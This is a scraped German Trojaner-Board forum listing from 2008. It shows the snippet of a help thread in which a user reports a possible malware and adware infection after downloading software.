  17. Malware,adware usw.
    Mülltonne - 27.06.2008 (0)

Zum Thema Malware-gen, Adware-gen ...usw - Guten Abend zusammen Ich habe gestern versucht Software runterzuladen und bin dabei anscheinend voll in die Kuhscheiße getretten. Mein Computer läuft soweit stabil... naja er kommt mir schon seit einigen - Malware-gen, Adware-gen ...usw...
Archiv
Du betrachtest: Malware-gen, Adware-gen ...usw auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.